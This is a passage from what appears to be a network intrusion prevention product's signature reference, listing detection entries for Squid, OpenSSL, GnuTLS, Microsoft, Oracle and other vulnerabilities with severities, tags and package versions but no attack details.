Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Squid-HTTP-Version-Number-Parsing-Denial-Of-Service
Description:
Back to top

HTTP8080_CS-Squid-Proxy-FTP-URI-Processing-Denial-Of-Service

About this situation: Detects denial of service attacks against the Squid proxy
Context: HTTP Proxy Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Squid, CVE2007, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-252-3038
Vulnerability: Squid-Proxy-FTP-URI-Processing-Denial-Of-Service
Description:
Back to top

HTTP8080_CS-TRACE-Request-With-Zero-Value-In-Max-Forwards-Header-Field

About this situation: TRACE request with a zero value in the Max-Forwards header field
Context: HTTP Proxy Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Squid, CVE2007, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-104-1314
Last changed: sgpkg-ips-252-3038
Vulnerability: HTTP-Squid-Proxy-TRACE-Request-Remote-Denial-Of-Service
Description:
Back to top

HTTP8080_Squid-Oversized-Reply-Header-Handling

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTP Proxy Server Stream
Severity: 2
Tags: Unix, Any Hardware, Squid, Unix not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-640-5211
Vulnerability: Squid-Oversized-Reply-Header-Handling
Description:
Back to top

HTTP8080_Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String

About this situation: Detects format string exploits against Trend Micro OfficeScan
Context: HTTP Proxy Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan Corporate Edition, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-82-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String
Description:
Back to top

HTTPS_CS-Alienvault-Ossim-Arbitrary-Command-Injection

About this situation: An attempt to exploit a vulnerability in AlienVault OSSIM detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AlienVault AlienVault, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Alienvault-Ossim-Arbitrary-Command-Injection
Description:
Back to top

HTTPS_CS-Alienvault-Ossim-Arbitrary-Command-Injection-2

About this situation: An attempt to exploit a vulnerability in AlienVault OSSIM detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AlienVault AlienVault, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-853-5242
Vulnerability: Alienvault-Ossim-Arbitrary-Command-Injection
Description:
Back to top

HTTPS_CS-Apache-2-Mod_SSL-Connection-Abort-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Apache-2-Mod_SSL-Connection-Abort-Denial-Of-Service
Description:
Back to top

HTTPS_CS-Apache-Mod_ssl-Ssl_Util_uuencode_Binary-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Apache-Mod_ssl-Ssl_Util_uuencode_Binary-Buffer-Overflow-Vulnerability
Description:
Back to top

HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-BOF

About this situation: Attempt to exploit improper handling of SSLv2 client master keys in OpenSSL via the Apache HTTP server
Context: HTTPS Client Stream
Severity: 10
Tags: Unix, Any Hardware, OpenSSL, Apache, CVE2002, Unix not specific, Apache not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: OpenSSL-Malformed-Client-Key-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-BOF-BSD

About this situation: Attempt to exploit improper handling of SSLv2 client master keys in OpenSSL via the Apache HTTP server on BSD
Context: HTTPS Client Stream
Severity: 10
Tags: BSD, Any Hardware, OpenSSL, Apache, CVE2002, BSD not specific, Apache not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: OpenSSL-Malformed-Client-Key-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-Buffer-Overflow

About this situation: Attempt to exploit improper handling of SSLv2 client master keys in OpenSSL
Context: HTTPS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2002, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-598-5211
Vulnerability: OpenSSL-Malformed-Client-Key-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Cisco-Prime-Collaboration-Provisioning-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Collaboration Provisioning detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Collaboration Provisioning, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1009-5242
Vulnerability: Cisco-Prime-Collaboration-Provisioning-Arbitrary-File-Deletion
Description:
Back to top

HTTPS_CS-F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in F5 Networks BIG-IP detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, F5 Networks BIG-IP Edge Gateway, F5 Networks BIG-IP Link Controller, F5 Networks BIG-IP WebAccelerator, F5 Networks BIG-IQ Cloud, F5 Networks BIG-IQ Device, F5 Networks BIG-IQ Security, F5 Networks Enterprise Manager, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-853-5242
Vulnerability: F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution
Description:
Back to top

HTTPS_CS-Gheg-Spambot

About this situation: Gheg spambot command and control channel communication detected
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, Gheg spambot, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-270-3038
Last changed: sgpkg-ips-270-3038
Vulnerability: Gheg-Spambot
Description:
Back to top

HTTPS_CS-GnuTLS-Libtasn1-_ASN1_extract_der_Octet-Memory-Access-Error

About this situation: An attempt to exploit a vulnerability in GnuTLS libtasn1 detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, GnuTLS libtasn1, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1516-5242
Vulnerability: GnuTLS-Libtasn1-_ASN1_extract_der_Octet-Memory-Access-Error
Description:
Back to top

HTTPS_CS-GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in GnuTLS detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-869-5242
Vulnerability: GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption
Description:
Back to top

HTTPS_CS-GnuTLS-Status_request-Extension-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in GnuTLS detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1179-5242
Vulnerability: GnuTLS-Status_request-Extension-Null-Pointer-Dereference
Description:
Back to top

HTTPS_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Free Software Foundation GnuTLS detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2012, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-475-5211
Vulnerability: GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
Description:
Back to top

HTTPS_CS-HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP LoadRunner detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2015, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-649-5211
Vulnerability: HP-LoadRunner-Launcher.dll-Stack-Buffer-Overflow
Description:
Back to top

HTTPS_CS-HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HPE Moonshot Provisioning Manager Appliance detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Moonshot Provisioning Manager Appliance, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1038-5242
Vulnerability: HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal
Description:
Back to top

HTTPS_CS-IIS-Ssl-Library-Malformed-Client-Hello-DoS

About this situation: Microsoft SSL library fails to handle malformed SSL Hello messages
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, IIS, MS2004, CVE2004, Windows not specific, IIS not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-277-4219
Vulnerability: SSLv3-Library-DoS
Description:
Back to top

HTTPS_CS-IIS-Ssl-PCT-Buffer-Overflow

About this situation: Buffer overflow in Microsoft's SSL Library PCT Protocol
Context: HTTPS Client Stream
Severity: 10
Tags: Windows, Any Hardware, IIS, MS2004, CVE2003, Windows not specific, IIS not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Ssl-PCT-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Large-Number-Of-Renegotiations-In-One-TLS-Connection

About this situation: Over 60 TLS renegotiations during one connection detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2016, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-819-5242
Vulnerability: OpenSSL-Tlsext_Type_status_request-Memory-Leak-Denial-Of-Service
Description:
Back to top

HTTPS_CS-Microsoft-Active-Directory-Federation-Services-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-12, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Active-Directory-Federation-Services-Code-Execution
Description:
Back to top

HTTPS_CS-Microsoft-HTTP.sys-HTTP-2.0-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-04, CVE2016, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1622-5242
Vulnerability: Microsoft-HTTP.sys-HTTP-2.0-Denial-Of-Service
Description:
Back to top

HTTPS_CS-Microsoft-Windows-HTTP.sys-DoS-CVE-2022-35748

About this situation: A SNI extension trying to trigger a vulnerability in IIS Server detected.
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-08, CVE2022, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1491-5242
Last changed: sgpkg-ips-1491-5242
Vulnerability: Microsoft-Windows-HTTP.sys-DoS-CVE-2022-35748
Description:
Back to top

HTTPS_CS-Microsoft-Windows-QUIC-Transport-Parameters-Handling-Resource-Exhaustion

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-10, CVE2023, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Vulnerability: Microsoft-Windows-QUIC-Transport-Parameters-Handling-Resource-Exhaustion
Description:
Back to top

HTTPS_CS-Microsoft-Windows-Schannel-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-11, CVE2014, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1622-5242
Vulnerability: Microsoft-Windows-Schannel-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Microsoft-Windows-Schannel-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-11, CVE2014, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1622-5242
Vulnerability: Microsoft-Windows-Schannel-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Netscape-Network-Security-Services-Library-SSLv2-Buffer-Overflow

About this situation: Detects attempts to exploit a buffer overflow vulnerability in the SSLv2 implementation of the NSS library
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun ONE Web Server, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-925-5242
Vulnerability: Netscape-Network-Security-Services-Library-Heap-Overflow
Description:
Back to top

HTTPS_CS-Netscape-NSS-Library-SSLv2-Record-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Netscape NSS
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla NSS, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Netscape-NSS-Library-SSLv2-Record-Parsing-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Node.js-Foundation-Node.js-TLS-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Node.js detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Node.js, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Node.js-Foundation-Node.js-TLS-Denial-Of-Service
Description:
Back to top

HTTPS_CS-Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell File Management Suite detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow
Description:
Back to top

HTTPS_CS-OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-663-5211
Vulnerability: OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass
Description:
Back to top

HTTPS_CS-OpenSSL-ASN.1-Client-Certificate-Double-Free-Code-Execution

About this situation: Detects malformed SSL client certificate
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2003, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-102-1314
Last changed: sgpkg-ips-695-5211
Vulnerability: OpenSSL-ASN.1-Client-Certificate-Double-Free-Code-Execution
Description:
Back to top

HTTPS_CS-OpenSSL-BN_Mod_sqrt-Infinite-Loop

About this situation: A vulnerability in OpenSSL detected.
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2022, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1455-5242
Vulnerability: OpenSSL-BN_Mod_sqrt-Infinite-Loop
Description:
Back to top

HTTPS_CS-OpenSSL-ChangeCipher-Before-Key-Exchange

About this situation: A vulnerability in OpenSSL
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-592-5211
Vulnerability: OpenSSL-ChangeCipher-MITM-Security-Bypass
Description:
Back to top

HTTPS_CS-OpenSSL-Dhe-Client-Key-Exchange-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-640-5211
Vulnerability: OpenSSL-Dhe-Client-Key-Exchange-Denial-Of-Service
Description:
Back to top

HTTPS_CS-OpenSSL-DTLS-Srtp-Extension-Parsing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1179-5242
Vulnerability: OpenSSL-DTLS-Srtp-Extension-Parsing-Denial-Of-Service
Description:
Back to top

HTTPS_CS-OpenSSL-ECDH-Use-After-Free

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1608-5242
Vulnerability: OpenSSL-ECDH-Use-After-Free
Description:
Back to top

HTTPS_CS-OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion
Description:
Back to top

HTTPS_CS-OpenSSL-Get-Shared-Ciphers-Function-Off-By-One-Buffer-Overflow

About this situation: Detects attempts to exploit the off-by-one vulnerability in OpenSSL get_shared_ciphers function
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-695-5211
Vulnerability: OpenSSL-Get-Shared-Ciphers-Function-Off-By-One-Buffer-Overflow
Description:
Back to top

HTTPS_CS-OpenSSL-Invalid-Pss-Parameters-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-640-5211
Vulnerability: OpenSSL-Invalid-Pss-Parameters-Denial-Of-Service
Description:
Back to top

HTTPS_CS-OpenSSL-Invalid-SRP-Parameter-A-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Vulnerability: OpenSSL-Invalid-SRP-Parameter-Buffer-Overflow
Description:
Back to top

HTTPS_CS-OpenSSL-SSL3_al_warning-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-819-5242
Vulnerability: OpenSSL-SSL3_al_warning-Denial-Of-Service
Description:
Back to top

HTTPS_CS-OpenSSL-SSLv2-Get-Shared-Ciphers-Function-Buffer-Overflow

About this situation: Detects overly long SSLv2 client hello messages
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SSL-OpenSSL-Get-Shared-Ciphers-Function-Buffer-Overflow
Description:
Back to top

HTTPS_CS-OpenSSL-SSLv3-Get-Shared-Ciphers-Function-Buffer-Overflow

About this situation: Detects overly long SSLv3 client hello messages
Context: HTTPS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2006, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SSL-OpenSSL-Get-Shared-Ciphers-Function-Buffer-Overflow
Description:
Back to top

HTTPS_CS-OpenSSL-TLS-Server-Renegotiation-Null-Pointer-Dereference

About this situation: A vulnerability in OpenSSL detected.
Context: HTTPS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2021, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Vulnerability: OpenSSL-TLS-Server-Renegotiation-Null-Pointer-Dereference
Description:
Back to top

HTTPS_CS-OpenSSL-Tls_Get_Gessage_Body-Function-Init_Msg-Structure-Use-After-Free

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: OpenSSL-Tls_Get_Gessage_Body-Function-Init_Msg-Structure-Use-After-Free
Description:
Back to top

HTTPS_CS-OpenSSL-X509_cmp_Time-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1516-5242
Vulnerability: OpenSSL-X509_cmp_Time-Denial-Of-Service
Description:
Back to top

HTTPS_CS-Oracle-Bea-WebLogic-Server-Plug-ins-Certificate-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle BEA WebLogic Server detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic Server, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1516-5242
Vulnerability: Oracle-Bea-WebLogic-Server-Plug-ins-Certificate-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Oracle-Secure-Backup-Administration-Server-Command-Injection

About this situation: Attempt to exploit a command injection vulnerability in Oracle Secure Backup server detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2009, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Oracle-Secure-Backup-Administration-Server-Command-Injection
Description:
Back to top

HTTPS_CS-Oracle-Secure-Backup-Remote-Cookies-Command-Injection

About this situation: Specially crafted HTTP request allows unauthorized command execution
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Oracle-Secure-Backup-Server-Login-Cookies-Command-Injection
Description:
Back to top

HTTPS_CS-Plaintext-Request-In-HTTPS-Context

About this situation: Detects non-SSL HTTP requests
Context: HTTPS Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Apache, CVE2005, Any Operating System not specific, Apache not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-731-5211
Vulnerability: HTTP-Apache-Mod-SSL-Custom-Error-Page-Non-SSL-DoS
Description:
Back to top

HTTPS_CS-Red-Hat-librelp-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Red Hat librelp detected
Context: HTTPS Client Stream
Severity: 7
